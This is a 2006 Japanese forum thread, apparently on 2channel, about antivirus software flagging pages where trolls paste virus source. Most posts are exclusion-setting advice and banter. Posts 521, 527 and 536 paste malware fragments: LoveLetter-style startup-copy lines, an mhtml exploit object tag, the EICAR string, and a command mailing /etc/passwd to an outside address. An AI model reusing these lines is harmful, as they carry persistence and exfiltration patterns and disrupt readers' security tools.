1 名前:他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???] 只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。 あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。 また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。 ■この問題について■ 2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません) ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。 また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。 これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。 ■まとめと対策■ 2ちゃんねる見ていたらvbsウィルスが検出された! info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12 2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか? info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 2chブラウザのログ保存フォルダを「除外」に設定。 NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。 前スレ ノートンがvbsウィルスのソースに誤反応 pc.2ch.net/test/read.cgi/sec/1025872269/ ノートンがvbsウィルスのソースに誤反応2 pc5.2ch.net/test/read.cgi/pcqa/1033948204/ テンプレ>>1-10 あたり
449 名前:ひよこ名無しさん mailto:sage [2006/03/02(木) 21:46:27 ID:???] >>448 202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、 警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり 深刻に考えないで良いです。
450 名前:ひよこ名無しさん mailto:sage [2006/03/02(木) 21:49:48 ID:???] >>446 Microsft Update 入れてください(><)
451 名前:448 mailto:sage [2006/03/03(金) 18:37:00 ID:???] >>449 サンクス
452 名前:ひよこ名無しさん mailto:sage [2006/03/04(土) 05:32:46 ID:???] avastがvbsウィルスのソースに誤反応 ってスレも立ってほしいなあ
453 名前:ひよこ名無しさん [2006/03/13(月) 18:59:55 ID:V3zGYCXt] u
454 名前:ひよこ名無しさん mailto:sage [2006/03/13(月) 21:10:07 ID:???] 元祖ぶる殿 ◆U/gDqFZzsY の 自作自演 pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 WIN2000を使っています。 一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が なくなってしまいました。 スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても 復活させ方が分かりません。 また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。 512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 >>511 [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop これを デスクトップの表示.scf として保存、 クイック起動バーにD&D。 513 名前:名無し~3.EXE 投稿日:02/05/19 13:17 >>511-512 自作自演失敗? 514 名前:名無し~3.EXE 投稿日:02/05/19 13:19 でもなんで自演なんてするの?
455 名前:ひよこ名無しさん [2006/03/21(火) 09:43:56 ID:xHVuEeZu] u
456 名前:ひよこ名無しさん [2006/03/23(木) 14:11:32 ID:bCv+njJc] キタ━━ <body onload=window()> ━━━ !!
457 名前:ひよこ名無しさん mailto:sage [2006/03/23(木) 14:12:39 ID:???] >>456 さっさと消えろ バカ
458 名前:ひよこ名無しさん [2006/03/23(木) 14:16:47 ID:bCv+njJc] 即反応かよ
459 名前:ひよこ名無しさん mailto:sage [2006/03/23(木) 14:18:02 ID:???] 元祖ぶる殿 ◆U/gDqFZzsY の自作自演 pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846 837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa あまりに馬鹿馬鹿しい質問ですいません。 Windows Media Plyaer と KbMedia Player がパソコンの中にあるのですが、MP3ファイルをクリックすると Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか? 838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:??? >>837 またきたのか? Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。 839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa >>837 1.mp3のファイルをクリック 2.「アプリケーションから開く」を選択 3.プログラムの選択 4.「これらのファイルを開くときは、 いつもこのアプリケーションを使う」にチェック 5.OK 840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:??? >>839 自作自演するときはIDを消しましょうね(ワラ
460 名前:ひよこ名無しさん mailto:sage [2006/03/23(木) 22:58:37 ID:???] 元祖ぶる殿 ◆U/gDqFZzsY の 自作自演 pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 WIN2000を使っています。 一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が なくなってしまいました。 スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても 復活させ方が分かりません。 また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。 512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 >>511 [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop これを デスクトップの表示.scf として保存、 クイック起動バーにD&D。 513 名前:名無し~3.EXE 投稿日:02/05/19 13:17 >>511-512 自作自演失敗? 514 名前:名無し~3.EXE 投稿日:02/05/19 13:19 でもなんで自演なんてするの?
461 名前:ひよこ名無しさん [2006/03/24(金) 12:13:15 ID:+3ig7Sae] 総合質問のスレッドで質問したところ、ここに誘導されたので、 再度質問させていただきます。マルチになってしまいますが、お願いします。 OS:XPhome 使用ソフト:ノートンアンチウイルス2006 ウイルスコード的なワームのようなものが貼られたらしく、ノートンが侵入警告を出して、 その後、そのスレとセキュリティ板にアクセスできなくなりました。これは無害でしょうか?あと対処法も教えてください。 ノートンが出したメッセージは、よく覚えてませんが、「2ch」の文字列が始のほうにありました。 ログを削除したのでスレ番号&レス番号までは分かりませんが、初心者の質問板の物凄い勢いで誰かが質問に答える スレです。昨日の11:30分ほどのレスだったと思います。
462 名前:ひよこ名無しさん [2006/03/24(金) 12:14:12 ID:+3ig7Sae] ちなみにjane doe styleで2ちゃんねるを閲覧しています。
463 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:15:48 ID:???] >461 質問する前にこのスレを読めと書いたはずだが
464 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:15:50 ID:???] >>461-462 おまえバカだろ
465 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:27:10 ID:???] >>461 >>4
466 名前:ひよこ名無しさん [2006/03/24(金) 12:35:50 ID:+3ig7Sae] ラブレターなどのウイルスではなくノートンプロテクションセンターが、侵入の試みを 遮断みたいなのが出るんですけど、このスレを全部読んでもどれが自分の症状の 解決策なのか分かりません・・・・。 ログのオートプロテクトの除外と手動スキャンの除外は前からしてあるのですが・・・・。 >>4 を見ても何がなんだか・・・・。
467 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:40:54 ID:???] >>466 おまえが初めに質問したスレでの自分へのレスをちゃんとよめや
468 名前:釣り氏 ◆RaigyoS2No mailto:sage [2006/03/24(金) 12:53:57 ID:???] >>467 見てきましたが、当方インターネットセキュリティではなくアンチウイルスなので 書いてあることができません・・・・。
469 名前:釣り氏 ◆RaigyoS2No [2006/03/24(金) 12:54:46 ID:+3ig7Sae] これは他スレで使ってるコテなので気にしないでください。
470 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:57:39 ID:???] ↓出身の方ですか。ご苦労様です。 www.redout.net/data/osietekun.html
471 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 12:58:06 ID:???] >>469 何だ釣りなのか。 思いっきり釣られちゃったよ(´∀`) なかなかの釣り師ですね。
472 名前:釣り氏 ◆RaigyoS2No [2006/03/24(金) 12:58:48 ID:+3ig7Sae] 具体的にどのレスの何を実行すればいいかということだけでも教えてくれませんか?
473 名前:釣り氏 ◆RaigyoS2No [2006/03/24(金) 12:59:42 ID:+3ig7Sae] >>471 このコテはリアルで魚釣りなんで・・・・。 マジレスお願いします・・・。
474 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:00:55 ID:???] 釣り氏 ◆RaigyoS2Noで検索 ttp://www.google.com/search?hl=ja&q=%E9%87%A3%E3%82%8A%E6%B0%8F+%E2%97%86RaigyoS2No&btnG=Google+%E6%A4%9C%E7%B4%A2
475 名前:釣り氏 ◆RaigyoS2No [2006/03/24(金) 13:04:32 ID:+3ig7Sae] すみません。これ以上いると荒れるようなので、これで失礼します・・・。 質問は却下ということでお願いします・・・・。
476 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:05:10 ID:???] >>473 何の魚を飼ってたの?環境省にごめんなさいしなきゃいけなかったなんて。。
477 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:08:04 ID:???] >>476 ブルーギル
478 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:08:25 ID:???] >>473 本当に「インターネットセキュリティではなくアンチウイルス」なら、これが 参考になるかも(自分は2年ほど前にノートンやめたので確認できないが) qb5.2ch.net/test/read.cgi/operate/1142464918/781
479 名前:ひよこ名無しさん mailto:sage [2006/03/24(金) 13:10:03 ID:???] >>477 (ノ∀`) アチャー
480 名前:名無しさん@お腹いぱーい。 mailto:sage [2006/03/24(金) 21:51:35 ID:???] 緊急的に変えてみました。 info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures 他にNAVのワーム誤反応に関する対処方法が見つかりましたらお知らせください。
481 名前:ひよこ名無しさん [2006/03/24(金) 23:32:32 ID:5GkwjhYT] >>480 の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。 だからできなかった。まあIEで読めるからいいんだけどね。
482 名前:ひよこ名無しさん [2006/03/25(土) 00:28:09 ID:yFt5KPiX] カサマツさん
483 名前:ひよこ名無しさん mailto:sage [2006/03/25(土) 10:37:30 ID:???] ぼるぷー ◆sTCCYJJ/Lo の 自作自演 pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 WIN2000を使っています。 一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が なくなってしまいました。 スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても 復活させ方が分かりません。 また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。 512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 >>511 [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop これを デスクトップの表示.scf として保存、 クイック起動バーにD&D。 513 名前:名無し~3.EXE 投稿日:02/05/19 13:17 >>511-512 自作自演失敗? 514 名前:名無し~3.EXE 投稿日:02/05/19 13:19 でもなんで自演なんてするの?
484 名前:ひよこ名無しさん [2006/03/25(土) 15:16:53 ID:yFt5KPiX] 誰か答えてくれ。
485 名前:Today+ 210-194-140-30.rev.home.ne.jp+Dinner mailto:sage [2006/03/25(土) 15:28:44 ID:???] あれ?
486 名前:ひよこ名無しさん mailto:sage [2006/03/25(土) 21:06:36 ID:???] ◆OCHZHO05EY の 自作自演 pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 WIN2000を使っています。 一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が なくなってしまいました。 スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても 復活させ方が分かりません。 また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。 512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13 >>511 [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop これを デスクトップの表示.scf として保存、 クイック起動バーにD&D。 513 名前:名無し~3.EXE 投稿日:02/05/19 13:17 >>511-512 自作自演失敗? 514 名前:名無し~3.EXE 投稿日:02/05/19 13:19 でもなんで自演なんてするの?
487 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 00:25:22 ID:???] >>480 こういうサイトって新鯖に変わるごとに新しい鯖のアドレス追加してるのですか? それとも、それは手動で追加しないと駄目なのですか?
488 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 01:50:45 ID:???] >>487 手動で追加してください。
489 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 10:00:20 ID:???] >>487 手動ですね ある意味DNS鯖と逆を行く作業な訳ですから
490 名前:ひよこ名無しさん [2006/03/26(日) 13:41:53 ID:L69KVZ4+] >>1 を読んだんですが、 ログ保存フォルダを手動スキャンから除外するのは何故なんでしょうか?
491 名前:ひよこ名無しさん [2006/03/26(日) 13:42:57 ID:We2xmHRt] スーパー競馬のモバイル投票(通信費以外無料)で 【宮記念】みんなでウインクリューガーを1番人気にしよう! ex14.2ch.net/test/read.cgi/keiba/1143011764 モバイル ↓ mob.cx-keiba.jp PC ↓ sports.nifty.com/superkeiba/ フジテレビ15:00〜から始まるスーパー競馬で みんなウインガー(本来はありえない人気薄の馬w)に投票して 若槻千夏と福原アナのリアクション見ようぜwww 頼むおまいら!!フジVSvip、vipperの力を見せてくれ!!!!! ) ∩∩ ( ┏┓ ┏━━┓ .) |.巾| ( .┏┓┏┓┏┓┏┓ ┏┛┗┓┃ ■ ┃┏━━━━ ノ人ヽ ━━━━┓┃┃┃┃┃┃┃┃ ┣- -┫┃┏┓┃┗━━━//━\\━━━┛┃┃┃┃┃┃┃┃ ┗┓┏┛┗┛┃┃ Λ_Λ/ ∩∩ \ Λ_Λ ┣┫┣┫┣┫┣┫ ┗┛ ┗┛ ( ´∀) |.┃| (∀` ) .┗┛┗┛┗┛┗┛ / ⌒\ ノ 人ニニニニニ⌒\ / /\ Y / \ \ ノ / __ ̄_______ ヽ ヽ ノ⌒、 ノ^ヽ (( / |||┌─────┐ J | | 入 Y⌒/\) |_/ \`Y / ||| |ヽ(゚∀゚)ノ .| ◎ | / | / \/ // /\/ .||| | ( ) ヽ(゚∀゚).| .| ─ し/\) \\ /// / / ||| | < < (゚∀゚)ノ | |||||| | \ \ \\ スーパー競馬
492 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 14:18:37 ID:???] >>490 誤反応させないようにするためじゃないの?
493 名前:ひよこ名無しさん mailto:sage [2006/03/26(日) 14:20:11 ID:???] >>490 本当に>>1 を読んだなら理解できるはず。 簡単にまとめると、ノートンはウィルスとして動作しないものまでウィルスと判定する。 (部分的なパターン照合だけで判定するため) ノートンのこの性質を悪用して、ノートンを反応させる文字列を2chに貼りまくるヴァカが大勢いる。 ノートン側も2ch側も対応する気はなく、ノートンユーザーが各自対策するしかない。 「手動スキャン」に限って言えば、自動で駆除/隔離しないようにして、いちいち 手動で対応してもよいなら敢えて除外しないという選択もあり。
494 名前:ひよこ名無しさん [2006/03/27(月) 01:29:18 ID:l0NeUula] Avastですが191の方法でも駄目です。 私だけでもないようです 524 :名無しさん@お腹いっぱい。 :2005/06/11(土) 16:44:33 こんにちは。質問です。 2ちゃんを見てると時々ウイルスが発見されて スレ自体が見られなくなるんですが、良い解決策があれば教えてください。 2ちゃんブラウザはギコナビ、アンチウイルスはavast!です。 発見されるウイルスはWin32:Mhtplo-26 [Trj]ってのです。 avastの設定の「例外」に 2ちゃんのlogファイルを入れてみたんですがそれでも駄目でした。
495 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 01:29:55 ID:???] >>494 ウイルス持って逃げろ。
496 名前:ひよこ名無しさん [2006/03/27(月) 03:08:39 ID:l0NeUula] 意味がわかりません
497 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 07:11:47 ID:???] 最近PCが重い! │ ├ 1.PCを買い換える │ │ [まちがい] │ 確実な方法ではありますが、お金がかかるのが難点です。 │ それよりも別の手段を探してみませんか? │ ちょっとしたフリーウェアでなんとかなるかも? │ ↑ │ ココがポイント! │ └ 2.RegSeekerを使う [せいかい] Regseeker ttp://www.hoverdesk.net/freeware.htm RegSeeker1.3Beta日本語ファイル ttp://downloads.at.infoseek.co.jp/
498 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 15:04:09 ID:???] 漏れなくシステム破壊の特典あり!!!
499 名前:ひよこ名無しさん [2006/03/27(月) 15:18:31 ID:l0NeUula] 意味がわかりません
500 名前:ひよこ名無しさん mailto:sage [2006/03/27(月) 16:03:22 ID:???] >>494 ここにavastユーザーはあまりこないので 誘導されたこととテンプレをよく読んで より詳しい環境を添えて↓で聞いてください。 avast! Anti-Virus Part41 pc8.2ch.net/test/read.cgi/sec/1143369350/
501 名前:ひよこ名無しさん [2006/03/27(月) 22:43:15 ID:l0NeUula] 最初そちらに書き込もうと思ったのですが 質問できる雰囲気じゃないんです。
502 名前:ひよこ名無しさん mailto:sage [2006/03/28(火) 01:04:40 ID:???] >>501 新スレに移行しましたね。 avast! Anti-Virus Part43 pc8.2ch.net/test/read.cgi/sec/1143473121/ >>500 にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。 嵐があっても見てくださる人はいます。 チャットではないので即レスは期待しないでくださいね。 邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。 参考に 一般的な質問の仕方 ansitu.xrea.jp/guidance/?methodofquestion
503 名前:ひよこ名無しさん [2006/03/28(火) 14:26:03 ID:YrT7DvdY] 502さんありがとう。 流れが相変わらず速いので機を見て質問することにします。 次回はNortonだけでなくAvastもスレのタイトルに加えてください。
504 名前:ひよこ名無しさん [2006/04/10(月) 20:39:28 ID:x24VBSPG] ↑
505 名前:ひよこ名無しさん [2006/04/10(月) 21:13:51 ID:xObkN9pL] Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。 sakura01.bbspink.com/test/read.cgi/ascii/1135064245/l50 (´・ω・`)ボスケテ ノートンさんが反応します。
506 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:16:42 ID:???] >>505 キンタマです。
507 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:20:28 ID:???] >506 誤反応ってことですか??
508 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:20:58 ID:???] >>507 トロイです。
509 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:21:56 ID:???] >>508 (´・ω・`)ショボン
510 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:23:26 ID:???] 検疫→削除で桶ですか??
511 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:25:47 ID:???] 683を除外(´・ω・`)
512 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:27:20 ID:???] >>511 初心者なもので分かりませんorz683とは何ですか?
513 名前:sage [2006/04/10(月) 21:58:13 ID:EhjrOlSY] テスト
514 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:58:27 ID:???] >>512 キンタマです。
515 名前:ひよこ名無しさん mailto:sage [2006/04/10(月) 21:59:34 ID:???] テスト
516 名前:SAGE [2006/04/10(月) 22:01:07 ID:EhjrOlSY] テスト
517 名前:ひよこ名無しさん mailto:SAGE [2006/04/10(月) 22:02:04 ID:???] テスト
518 名前:ひよこ名無しさん mailto:HAGE [2006/04/10(月) 22:03:53 ID:???] テスト
519 名前:ひよこ名無しさん [2006/04/12(水) 21:37:07 ID:oU4WH0fi] money4.2ch.net/test/read.cgi/pachij/1140536153/ ここのすれの>>457のところにウイルスコードがあってあるので、 ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→ ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→ 1140536153と1140536153.idx→すべてOKで閉じ をしたのに、相変わらず上のスレではノートンが反応します。 再度除外項目を見たのですがきちんと除外項目に入ってました。 何故反応するのでしょうか??
520 名前:ひよこ名無しさん [2006/04/12(水) 22:14:11 ID:oU4WH0fi] age
521 名前:ひよこ名無しさん mailto:sage [2006/04/12(水) 22:35:04 ID:???] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub Sub check_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PERSONAL.XLS") If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 End Sub
522 名前:519 [2006/04/12(水) 22:53:09 ID:oU4WH0fi] 他で聞きます。
523 名前:ぴーこ名無しさん mailto:・・・ ascii/1143450751/551 sage [2006/04/13(木) 00:07:39 ID:???] >>519 ,522 ・・・ >>1 2chブラウザのログ保存フォルダを「除外」に設定。 NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。 ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。 また、これとは別にワーム誤反応対策の設定もしてね。 info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures 2chNIS問題まとめページ mickey.mirv.net/2chnis.html
524 名前:ひよこ名無しさん mailto:sage [2006/04/15(土) 16:37:44 ID:???] 一昨日くらいからスレが見れなくなった もちろんログ除外はしてあるのに、ノートン切ると見れる どうして?ちなみに専ブラはギコナビ
525 名前:ひよこ名無しさん mailto:sage [2006/04/15(土) 23:21:55 ID:???] >>524 誤反応
526 名前:ひよこ名無しさん mailto:sage [2006/04/16(日) 09:18:27 ID:???] >>524 ログ除外以外にもやる事がある >>1 から読め
527 名前:ひよこ名無しさん [2006/04/17(月) 20:53:52 ID:Se29R1qE] c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START End Sub <body onload=window()>
528 名前:ひよこ名無しさん [2006/04/24(月) 17:37:20 ID:2zoSjqC7] にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。 htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。 エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。
529 名前:ひよこ名無しさん mailto:sage [2006/04/24(月) 20:13:42 ID:???] ふーん
530 名前:ひよこ名無しさん mailto:sage [2006/04/30(日) 18:51:48 ID:???] >NIS2005の場合(多分NIS2006も同じ) 同じではない件に付いて
531 名前:ぴーこ名無しさん mailto:・・・ ascii/1143450751/551 sage [2006/05/01(月) 23:31:23 ID:???] >>530 kwsk
532 名前:ぴーこ名無しさん mailto:sage [2006/05/01(月) 23:32:01 ID:???] 目欄が・・・orz...........
533 名前:ひよこ名無しさん [2006/05/04(木) 23:17:25 ID:Gcx9i+9f] >>524 と同じ症状です。 ここ1週間から出てる。
534 名前:ひよこ名無しさん [2006/05/13(土) 05:26:57 ID:w+9rO7hg] , -'"´  ̄`丶、_ ,.∩ `ヽ 〃∪'´ ̄`二二人\ ヽ | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ', |ハ ,ニ、 ,. - 、 | | | l | | ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、 | | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔 | ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。 l l /\ .. イV\川 | ,' l l ,イ `l ̄´ / /ヽl l l | l ハ `メ、 〃 ヽヽ、__ノ l ∨ └‐イ「ト--ァ'´ ハヽ__ノ ヽ/ } l」」 / / }`ー 〈_n| 八 / / /ノ 〈二二人 c /\/ / , イ / /厂 /\__>< {_
535 名前:ひよこ名無しさん mailto:sage [2006/05/13(土) 09:57:56 ID:???] , -'"´  ̄`丶、_ ,.∩ `ヽ 〃∪'´ ̄`二二人\ ヽ | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ', |ハ ,ニ、 ,. - 、 | | | l | | ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、 | | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔 | ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。 l l /\ .. イV\川 | ,' l l ,イ `l ̄´ / /ヽl l l | l ハ `メ、 〃 ヽヽ、__ノ l ∨ └‐イ「ト--ァ'´ ハヽ__ノ ヽ/ } l」」 / / }`ー 〈_n| 八 / / /ノ 〈二二人 c /\/ / , イ / /厂 /\__>< {_
536 名前:ひよこ名無しさん mailto:sage [2006/05/15(月) 14:24:13 ID:???] c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") cat /etc/passwd | mail nobody@nonexistent.com If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
537 名前:ひよこ名無しさん mailto:age [2006/05/19(金) 20:06:44 ID:???] 保守age
538 名前:ひよこ名無しさん [2006/05/24(水) 01:38:47 ID:uOt5d8a9] Live2ch使ってます NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。 もちろんスレは見れない状態です。 どうすれば回避できますか?
539 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 01:40:06 ID:???] ___ / \ ________ / ´` \ / | ・ ・ | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い | (● ●) | \________ \ ⊂ニ⊃ ノ \ ⊂ニ⊃  ̄ ̄ ̄
540 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 02:15:51 ID:???] >>538 pc7.2ch.net/test/read.cgi/software/1144772862/12 ログフォルダの指定を今一度確認してください。 以下の方法でウイルスの検出された場所がわかります。 検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。 service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/11ea5eb60c47e5c085256c470046ed2f/3a0dc97983b6908649256cee002d4b3b?OpenDocument Norton AntiVirus を起動し、[レポート] を選択する。 「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。
541 名前:538 mailto:sage [2006/05/24(水) 02:24:00 ID:???] >>540 グミクズがさっさと教えろや
